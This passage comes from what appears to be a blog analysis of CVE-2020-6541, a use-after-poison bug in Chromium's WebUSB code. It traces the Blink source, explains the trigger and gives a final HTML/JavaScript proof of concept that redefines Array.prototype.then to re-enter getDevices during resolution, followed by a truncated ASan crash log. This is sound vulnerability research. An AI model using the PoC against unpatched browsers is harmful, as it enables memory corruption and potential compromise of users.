class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>The source of <code>ResolveOrReject</code> is shown below. Note the last line of the function: unless the context is paused or script is forbidden, the ScriptPromiseResolver calls <code>ResolveOrRejectImmediately()</code> to <code>Resolve</code> or <code>Reject</code> right away.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">template</span> &lt;<span class="keyword">typename</span> T&gt;</span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">ResolveOrReject</span><span class="params">(T value, ResolutionState new_state)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  state_ = new_state;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  <span class="keyword">if</span> (<span class="built_in">GetExecutionContext</span>()-&gt;<span class="built_in">IsContextPaused</span>()) &#123;</span><br><span class="line">    <span class="built_in">ScheduleResolveOrReject</span>();</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// TODO(esprehn): This is a hack, instead 
we should CHECK that</span></span><br><span class="line">  <span class="comment">// script is allowed, and v8 should be running the entry hooks below and</span></span><br><span class="line">  <span class="comment">// crashing if script is forbidden. We should then audit all users of</span></span><br><span class="line">  <span class="comment">// ScriptPromiseResolver and the related specs and switch to an async</span></span><br><span class="line">  <span class="comment">// resolve.</span></span><br><span class="line">  <span class="comment">// See: http://crbug.com/663476</span></span><br><span class="line">  <span class="keyword">if</span> (ScriptForbiddenScope::<span class="built_in">IsScriptForbidden</span>()) &#123;</span><br><span class="line">    <span class="built_in">ScheduleResolveOrReject</span>();</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="built_in">ResolveOrRejectImmediately</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>In the preceding call, the ScriptPromiseResolver set <code>state_</code> to <code>kResolving</code>, so <code>ResolveOrRejectImmediately</code> takes the branch that calls <code>resolver_.Resolve</code>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">ScriptPromiseResolver::ResolveOrRejectImmediately</span><span class="params">()</span> 
</span>&#123;</span><br><span class="line">  <span class="built_in">DCHECK</span>(!<span class="built_in">GetExecutionContext</span>()-&gt;<span class="built_in">IsContextDestroyed</span>());</span><br><span class="line">  <span class="built_in">DCHECK</span>(!<span class="built_in">GetExecutionContext</span>()-&gt;<span class="built_in">IsContextPaused</span>());</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> (state_ == kResolving) &#123;</span><br><span class="line">      <span class="comment">// Resolve is called here</span></span><br><span class="line">      resolver_.<span class="built_in">Resolve</span>(value_.<span class="built_in">NewLocal</span>(script_state_-&gt;<span class="built_in">GetIsolate</span>()));</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">      <span class="built_in">DCHECK_EQ</span>(state_, kRejecting);</span><br><span class="line">      resolver_.<span class="built_in">Reject</span>(value_.<span class="built_in">NewLocal</span>(script_state_-&gt;<span class="built_in">GetIsolate</span>()));</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">Detach</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>Everything called from <code>ScriptPromise::InternalResolver::Resolve</code> onward is inside V8, so we do not follow the call chain any further here.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> 
ScriptPromise::InternalResolver::<span class="built_in">Resolve</span>(v8::Local&lt;v8::Value&gt; value) &#123;</span><br><span class="line">  <span class="keyword">if</span> (resolver_.<span class="built_in">IsEmpty</span>())</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">  v8::Maybe&lt;<span class="type">bool</span>&gt; result =</span><br><span class="line">      resolver_.<span class="built_in">V8Value</span>().<span class="built_in">As</span>&lt;v8::Promise::Resolver&gt;()-&gt;<span class="built_in">Resolve</span>(</span><br><span class="line">          script_state_-&gt;<span class="built_in">GetContext</span>(), value);</span><br><span class="line">  <span class="comment">// |result| can be empty when the thread is being terminated. We ignore such</span></span><br><span class="line">  <span class="comment">// errors.</span></span><br><span class="line">  <span class="built_in">ALLOW_UNUSED_LOCAL</span>(result);</span><br><span class="line"></span><br><span class="line">  <span class="built_in">Clear</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><h3 id="3-POC">3. POC</h3><h4 id="a-如何触发onServiceConnectionError">a. 
How to trigger OnServiceConnectionError</h4><p>We need to trace back the call chain of <code>OnServiceConnectionError</code>. Following the cross-references in the online source browser, we find that <code>USB::EnsureServiceConnection</code> registers <code>USB::OnServiceConnectionError</code> as the <code>disconnect_handler</code> of a service.</p><p>In other words, once that service is disconnected, our target function <code>OnServiceConnectionError</code> is called automatically.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">USB::EnsureServiceConnection</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  <span class="keyword">if</span> (service_.<span class="built_in">is_bound</span>())</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line"></span><br><span class="line">  <span class="built_in">DCHECK</span>(<span class="built_in">IsContextSupported</span>());</span><br><span class="line">  <span class="built_in">DCHECK</span>(<span class="built_in">IsFeatureEnabled</span>(ReportOptions::kDoNotReport));</span><br><span class="line">  <span class="comment">// See https://bit.ly/2S0zRAS for task types.</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">// 
Note the code below: it binds the service to the corresponding Mojo IPC interface</span></span><br><span class="line">  <span class="keyword">auto</span> task_runner =</span><br><span class="line">      <span class="built_in">GetExecutionContext</span>()-&gt;<span class="built_in">GetTaskRunner</span>(TaskType::kMiscPlatformAPI);</span><br><span class="line">  <span class="built_in">GetExecutionContext</span>()-&gt;<span class="built_in">GetBrowserInterfaceBroker</span>().<span class="built_in">GetInterface</span>(</span><br><span class="line">      service_.<span class="built_in">BindNewPipeAndPassReceiver</span>(task_runner));</span><br><span class="line">  <span class="comment">// Note this statement: it sets the callback invoked when the service disconnects, which is USB::OnServiceConnectionError</span></span><br><span class="line">  service_.<span class="built_in">set_disconnect_handler</span>(</span><br><span class="line">      WTF::<span class="built_in">Bind</span>(&amp;USB::OnServiceConnectionError, <span class="built_in">WrapWeakPersistent</span>(<span class="keyword">this</span>)));</span><br><span class="line"></span><br><span class="line">  <span class="built_in">DCHECK</span>(!client_receiver_.<span class="built_in">is_bound</span>());</span><br><span class="line"></span><br><span class="line">  service_-&gt;<span class="built_in">SetClient</span>(</span><br><span class="line">      client_receiver_.<span class="built_in">BindNewEndpointAndPassRemote</span>(task_runner));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>This leaves two questions.</p><ul><li><p>First, <strong>how do we get <code>USB::EnsureServiceConnection</code> to run</strong>? Clearly, if it never runs, <code>OnServiceConnectionError</code> is never registered as the handler, let alone called.</p><p>Following the cross-references again, we find that <code>USB::getDevices</code> calls <code>EnsureServiceConnection</code>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span 
class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">ScriptPromise <span class="title">USB::getDevices</span><span class="params">(ScriptState* script_state,</span></span></span><br><span class="line"><span class="params"><span class="function">                              ExceptionState&amp; exception_state)</span> </span>&#123;</span><br><span class="line"> <span class="comment">// ...</span></span><br><span class="line">  <span class="built_in">EnsureServiceConnection</span>();  <span class="comment">// note this call</span></span><br><span class="line">  <span class="keyword">auto</span>* resolver = <span class="built_in">MakeGarbageCollected</span>&lt;ScriptPromiseResolver&gt;(script_state);</span><br><span class="line">  get_devices_requests_.<span class="built_in">insert</span>(resolver);</span><br><span class="line">  service_-&gt;<span class="built_in">GetDevices</span>(WTF::<span class="built_in">Bind</span>(&amp;USB::OnGetDevices, <span class="built_in">WrapPersistent</span>(<span class="keyword">this</span>),</span><br><span class="line">                                 <span class="built_in">WrapPersistent</span>(resolver)));</span><br><span class="line">  <span class="keyword">return</span> resolver-&gt;<span class="built_in">Promise</span>();</span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure><p>Therefore we can <strong>call <code>USB::getDevices</code> to get <code>EnsureServiceConnection</code> executed</strong>, which sets things up for <code>OnServiceConnectionError</code> to run later.</p><p>In addition, because <code>getDevices</code> has been called, <strong>the <code>get_devices_requests_</code> set is non-empty</strong> when <code>OnServiceConnectionError</code> fires, so its loop goes on to call <code>Resolve</code> on each pending resolver.</p><p>In short, calling <code>getDevices</code> achieves both goals at once.</p></li><li><p>Second, <strong>how do we get the service to disconnect</strong>?</p><p>Auditing <code>USB::EnsureServiceConnection</code>, we see that the service is bound to a Mojo IPC pipe in that function. If we can cause that IPC pipe to close, the service's disconnect_handler fires, which ultimately runs our target function <code>OnServiceConnectionError</code>.</p><p>The simplest way to close the Mojo IPC pipe is to <strong>close the browser tab</strong>.</p></li></ul><p>So we can write the following code to trigger <code>OnServiceConnectionError</code>.</p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">if</span> (!location.<span class="property">hash</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="title function_">open</span>(location.<span class="property">href</span> + <span class="string">&#x27;#second&#x27;</span>);</span></span><br><span class="line"><span class="language-javascript">        &#125; <span class="keyword">else</span> &#123;</span></span><br><span 
class="line"><span class="language-javascript">            navigator.<span class="property">usb</span>.<span class="title function_">getDevices</span>();</span></span><br><span class="line"><span class="language-javascript">            <span class="title function_">close</span>();</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">    </span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br></pre></td></tr></table></figure><p>As the screenshot shows, it is triggered successfully:</p><p><img src="/2020/10/CVE-2020-6541/onSCE.png" alt="img"></p><h4 id="b-如何在Resolve内部执行getDevices">b. How to run getDevices inside Resolve</h4><p>We can now craft JS that makes <code>OnServiceConnectionError</code> run and thus reach its <code>resolver-&gt;Resolve</code> statement. The question is <strong>how to make this Promise execute JS of our choosing while it is being resolved</strong>.</p><blockquote><p>For ease of analysis, here is the source of <code>USB::OnServiceConnectionError</code> again.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">USB::OnServiceConnectionError</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  service_.<span class="built_in">reset</span>();</span><br><span class="line">  client_receiver_.<span class="built_in">reset</span>();</span><br><span class="line">  <span class="keyword">for</span> 
(ScriptPromiseResolver* resolver : get_devices_requests_)</span><br><span class="line">    <span class="comment">// Note the Resolve call here: the resolved value is an empty array</span></span><br><span class="line">    resolver-&gt;<span class="built_in">Resolve</span>(HeapVector&lt;Member&lt;USBDevice&gt;&gt;(<span class="number">0</span>));</span><br><span class="line">  get_devices_requests_.<span class="built_in">clear</span>();</span><br><span class="line"></span><br><span class="line">  <span class="keyword">for</span> (ScriptPromiseResolver* resolver : get_permission_requests_) &#123;</span><br><span class="line">    resolver-&gt;<span class="built_in">Reject</span>(<span class="built_in">MakeGarbageCollected</span>&lt;DOMException&gt;(</span><br><span class="line">        DOMExceptionCode::kNotFoundError, kNoDeviceSelected));</span><br><span class="line">  &#125;</span><br><span class="line">  get_permission_requests_.<span class="built_in">clear</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>At first I tried using the JS <code>then</code> method, but local debugging showed that it did not achieve the goal.</p><blockquote><p>The reason it fails is not yet clear; pinning it down probably requires a deeper understanding of how Promises work.</p></blockquote><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span 
class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">function</span> <span class="title function_">poc</span>(<span class="params"></span>) &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">if</span> (!location.<span class="property">hash</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">                <span class="title function_">open</span>(location.<span class="property">href</span> + <span class="string">&#x27;#second&#x27;</span>);</span></span><br><span class="line"><span class="language-javascript">            &#125; <span class="keyword">else</span> &#123;</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// note the then here</span></span></span><br><span class="line"><span class="language-javascript">                navigator.<span class="property">usb</span>.<span class="title function_">getDevices</span>().<span class="title function_">then</span>(<span class="function">() =&gt;</span> &#123;</span></span><br><span class="line"><span class="language-javascript">                    navigator.<span class="property">usb</span>.<span class="title function_">getDevices</span>();</span></span><br><span class="line"><span class="language-javascript">                &#125;);</span></span><br><span class="line"><span class="language-javascript">                <span class="title function_">close</span>();</span></span><br><span class="line"><span class="language-javascript">            &#125;</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">    </span><span class="tag">&lt;/<span 
class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span> <span class="attr">onload</span>=<span class="string">&quot;poc()&quot;</span>&gt;</span> <span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure><p>But we can approach it from another direction: the value that <code>OnServiceConnectionError</code> passes to <code>Resolve</code> is <code>HeapVector&lt;Member&lt;USBDevice&gt;&gt;(0)</code>, so at the JS level the promise is resolved with an empty array, <code>Array(0)</code>.</p><p>We can use the JS <code>Array.prototype.__defineGetter__()</code> API to install a callback.</p><blockquote><p>The <code>__defineGetter__</code> method binds a function to the specified property of the current object; <strong>when the value of that property is read, the bound function is called.</strong> - <a href="https://developer.mozilla.org/zh-CN/docs/Web/JavaScript/Reference/Global_Objects/Object/__defineGetter__">MDN</a></p></blockquote><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="title class_">Array</span>.<span class="property"><span class="keyword">prototype</span></span>.<span class="title function_">__defineGetter__</span>(<span class="string">&#x27;then&#x27;</span>, <span class="function">() =&gt;</span> &#123;</span><br><span class="line">    navigator.<span class="property">usb</span>.<span class="title function_">getDevices</span>();</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure><p>This way, when <code>OnServiceConnectionError</code> resolves the promise with an Array, the array's <code>then</code> property is read during resolution, which invokes the JS code we installed.</p><p>With that, we arrive at the final PoC code.</p><h4 id="c-最终POC代码">c. 
Final PoC code</h4><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">function</span> <span class="title function_">poc</span>(<span class="params"></span>) &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">if</span> (!location.<span class="property">hash</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">                <span class="title function_">open</span>(location.<span class="property">href</span> + <span class="string">&#x27;#second&#x27;</span>);</span></span><br><span class="line"><span class="language-javascript">            &#125; <span class="keyword">else</span> &#123;</span></span><br><span class="line"><span class="language-javascript">                <span class="title class_">Array</span>.<span class="property"><span class="keyword">prototype</span></span>.<span class="title function_">__defineGetter__</span>(<span class="string">&#x27;then&#x27;</span>, 
<span class="function">() =&gt;</span> &#123;</span></span><br><span class="line"><span class="language-javascript">                    navigator.<span class="property">usb</span>.<span class="title function_">getDevices</span>();</span></span><br><span class="line"><span class="language-javascript">                &#125;);</span></span><br><span class="line"><span class="language-javascript">                navigator.<span class="property">usb</span>.<span class="title function_">getDevices</span>();</span></span><br><span class="line"><span class="language-javascript">                <span class="title function_">close</span>();</span></span><br><span class="line"><span class="language-javascript">            &#125;</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">    </span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span> <span class="attr">onload</span>=<span class="string">&quot;poc()&quot;</span>&gt;</span> <span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure><p>The vulnerability reporter's ASan log is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span 
class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br></pre></td><td class="code"><pre><span 
class="line">=================================================================</span><br><span class="line">==<span class="number">1</span>==ERROR: AddressSanitizer: use-after-poison on address <span class="number">0x7ec19e552e28</span> at pc <span class="number">0x7fd471762cee</span> bp <span class="number">0x7fffc32b2290</span> sp <span class="number">0x7fffc32b2288</span></span><br><span class="line">READ of size <span class="number">8</span> at <span class="number">0x7ec19e552e28</span> thread <span class="built_in">T0</span> (chrome)</span><br><span class="line">    #<span class="number">0</span> <span class="number">0x7fd471762ced</span> in blink::MemberBase&lt;blink::ScriptPromiseResolver, (blink::TracenessMemberConfiguration)<span class="number">0</span>&gt;::<span class="built_in">GetRaw</span>() <span class="type">const</span> ./../../third_party/blink/renderer/platform/heap/member.h:<span class="number">250</span>:<span class="number">44</span></span><br><span class="line">    #<span class="number">1</span> <span class="number">0x7fd471762ced</span> in blink::MemberBase&lt;blink::ScriptPromiseResolver, (blink::TracenessMemberConfiguration)<span class="number">0</span>&gt;::<span class="built_in">Get</span>() <span class="type">const</span> ./../../third_party/blink/renderer/platform/heap/member.h:<span class="number">188</span>:<span class="number">27</span></span><br><span class="line">    #<span class="number">2</span> <span class="number">0x7fd471762ced</span> in <span class="type">bool</span> blink::<span class="keyword">operator</span>==&lt;blink::ScriptPromiseResolver, blink::ScriptPromiseResolver&gt;(blink::Member&lt;blink::ScriptPromiseResolver&gt; <span class="type">const</span>&amp;, blink::Member&lt;blink::ScriptPromiseResolver&gt; <span class="type">const</span>&amp;) ./../../third_party/blink/renderer/platform/heap/persistent.h:<span class="number">826</span>:<span class="number">12</span></span><br><span class="line">    #<span 
class="number">3</span> <span class="number">0x7fd471762ced</span> in <span class="type">bool</span> WTF::HashTraitsEmptyValueChecker&lt;WTF::HashTraits&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt; &gt;, <span class="literal">false</span>&gt;::IsEmptyValue&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt; &gt;(blink::Member&lt;blink::ScriptPromiseResolver&gt; <span class="type">const</span>&amp;) ./../../third_party/blink/renderer/platform/wtf/hash_traits.h:<span class="number">350</span>:<span class="number">18</span></span><br><span class="line">    #<span class="number">4</span> <span class="number">0x7fd471762ced</span> in <span class="type">bool</span> WTF::IsHashTraitsEmptyValue&lt;WTF::HashTraits&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt; &gt;, blink::Member&lt;blink::ScriptPromiseResolver&gt; &gt;(blink::Member&lt;blink::ScriptPromiseResolver&gt; <span class="type">const</span>&amp;) ./../../third_party/blink/renderer/platform/wtf/hash_traits.h:<span class="number">355</span>:<span class="number">10</span></span><br><span class="line">    #<span class="number">5</span> <span class="number">0x7fd471762ced</span> in WTF::HashTableHelper&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt;, WTF::IdentityExtractor, WTF::HashTraits&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt; &gt; &gt;::<span class="built_in">IsEmptyBucket</span>(blink::Member&lt;blink::ScriptPromiseResolver&gt; <span class="type">const</span>&amp;) ./../../third_party/blink/renderer/platform/wtf/hash_table.h:<span class="number">666</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">6</span> <span class="number">0x7fd471762ced</span> in WTF::HashTableHelper&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt;, WTF::IdentityExtractor, WTF::HashTraits&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt; &gt; &gt;::<span class="built_in">IsEmptyOrDeletedBucket</span>(blink::Member&lt;blink::ScriptPromiseResolver&gt; <span 
class="type">const</span>&amp;) ./../../third_party/blink/renderer/platform/wtf/hash_table.h:<span class="number">673</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">7</span> <span class="number">0x7fd471762ced</span> in WTF::HashTable&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt;, blink::Member&lt;blink::ScriptPromiseResolver&gt;, WTF::IdentityExtractor, WTF::MemberHash&lt;blink::ScriptPromiseResolver&gt;, WTF::HashTraits&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt; &gt;, WTF::HashTraits&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt; &gt;, blink::HeapAllocator&gt;::<span class="built_in">IsEmptyOrDeletedBucket</span>(blink::Member&lt;blink::ScriptPromiseResolver&gt; <span class="type">const</span>&amp;) ./../../third_party/blink/renderer/platform/wtf/hash_table.h:<span class="number">841</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">8</span> <span class="number">0x7fd471762ced</span> in WTF::HashTableConstIterator&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt;, blink::Member&lt;blink::ScriptPromiseResolver&gt;, WTF::IdentityExtractor, WTF::MemberHash&lt;blink::ScriptPromiseResolver&gt;, WTF::HashTraits&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt; &gt;, WTF::HashTraits&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt; &gt;, blink::HeapAllocator&gt;::<span class="built_in">SkipEmptyBuckets</span>() ./../../third_party/blink/renderer/platform/wtf/hash_table.h:<span class="number">296</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">9</span> <span class="number">0x7fd471762ced</span> in WTF::HashTableConstIterator&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt;, blink::Member&lt;blink::ScriptPromiseResolver&gt;, WTF::IdentityExtractor, WTF::MemberHash&lt;blink::ScriptPromiseResolver&gt;, WTF::HashTraits&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt; &gt;, 
WTF::HashTraits&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt; &gt;, blink::HeapAllocator&gt;::<span class="keyword">operator</span>++() ./../../third_party/blink/renderer/platform/wtf/hash_table.h:<span class="number">373</span>:<span class="number">5</span></span><br><span class="line">    #<span class="number">10</span> <span class="number">0x7fd471762ced</span> in WTF::HashTableConstIteratorAdapter&lt;WTF::HashTable&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt;, blink::Member&lt;blink::ScriptPromiseResolver&gt;, WTF::IdentityExtractor, WTF::MemberHash&lt;blink::ScriptPromiseResolver&gt;, WTF::HashTraits&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt; &gt;, WTF::HashTraits&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt; &gt;, blink::HeapAllocator&gt;, WTF::HashTraits&lt;blink::Member&lt;blink::ScriptPromiseResolver&gt; &gt; &gt;::<span class="keyword">operator</span>++() ./../../third_party/blink/renderer/platform/wtf/hash_table.h:<span class="number">2242</span>:<span class="number">5</span></span><br><span class="line">    #<span class="number">11</span> <span class="number">0x7fd471762ced</span> in blink::USB::<span class="built_in">OnServiceConnectionError</span>() ./../../third_party/blink/renderer/modules/webusb/usb.cc:<span class="number">252</span>:<span class="number">40</span></span><br><span class="line">    #<span class="number">12</span> <span class="number">0x7fd4a239793e</span> in base::OnceCallback&lt;<span class="built_in">void</span> ()&gt;::<span class="built_in">Run</span>() &amp;&amp; ./../../base/callback.h:<span class="number">99</span>:<span class="number">12</span></span><br><span class="line">    #<span class="number">13</span> <span class="number">0x7fd4a239793e</span> in mojo::InterfaceEndpointClient::<span class="built_in">NotifyError</span>(base::Optional&lt;mojo::DisconnectReason&gt; <span class="type">const</span>&amp;) ./../../mojo/<span 
